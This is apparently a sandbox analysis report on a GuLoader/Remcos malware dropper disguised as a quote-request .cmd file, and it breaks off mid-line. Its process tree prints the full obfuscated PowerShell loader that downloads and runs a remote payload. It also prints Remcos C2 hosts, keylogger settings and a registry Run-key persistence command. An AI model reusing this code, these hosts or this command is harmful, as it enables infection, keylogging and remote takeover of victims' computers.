Windows Analysis Report
Teklif talebi BAKVENTA-BAKUUsurpationens.cmd

Overview

General Information

Sample name: Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
Analysis ID: 1435423
MD5: 69288c7e16a8ce2177346b2c62231603
SHA1: 87f0dad6634d4e6bedad3b505adb6c509fdc5f03
SHA256: b523b20d9df02eaf3cdbb3babbc50ac7cea1889c7a3f561d586b001c02615f8a
Tags: cmd

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7504 cmdline: powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf 
C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . 
JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' 
Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7668 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7752 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las 
Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . 
JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' 
Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8872 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 8948 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8992 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • chrome.exe (PID: 7864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 8048 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 5288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: amsi64_7504.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Strings:
  • 0xfbb5:$b2: ::FromBase64String(
  • 0xcf56:$s1: -join
  • 0x6702:$s4: +=
  • 0x67c4:$s4: +=
  • 0xa9eb:$s4: +=
  • 0xcb08:$s4: +=
  • 0xcdf2:$s4: +=
  • 0xcf38:$s4: +=
  • 0xf188:$s4: +=
  • 0xf208:$s4: +=
  • 0xf2ce:$s4: +=
  • 0xf34e:$s4: +=
  • 0xf524:$s4: +=
  • 0xf5a8:$s4: +=
  • 0xd671:$e4: Get-WmiObject
  • 0xd860:$e4: Get-Process
  • 0xd8b8:$e4: Start-Process

Source: amsi32_7752.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Strings:
  • 0xfb16:$b2: ::FromBase64String(
  • 0xcf56:$s1: -join
  • 0x6702:$s4: +=
  • 0x67c4:$s4: +=
  • 0xa9eb:$s4: +=
  • 0xcb08:$s4: +=
  • 0xcdf2:$s4: +=
  • 0xcf38:$s4: +=
  • 0xf188:$s4: +=
  • 0xf208:$s4: +=
  • 0xf2ce:$s4: +=
  • 0xf34e:$s4: +=
  • 0xf524:$s4: +=
  • 0xf5a8:$s4: +=
  • 0xd671:$e4: Get-WmiObject
  • 0xd860:$e4: Get-Process
  • 0xd8b8:$e4: Start-Process
  • 0x17225:$e4: Get-Process

System Summary

Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8872, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ProcessId: 8948, ProcessName: cmd.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stagenes
Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8948, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v 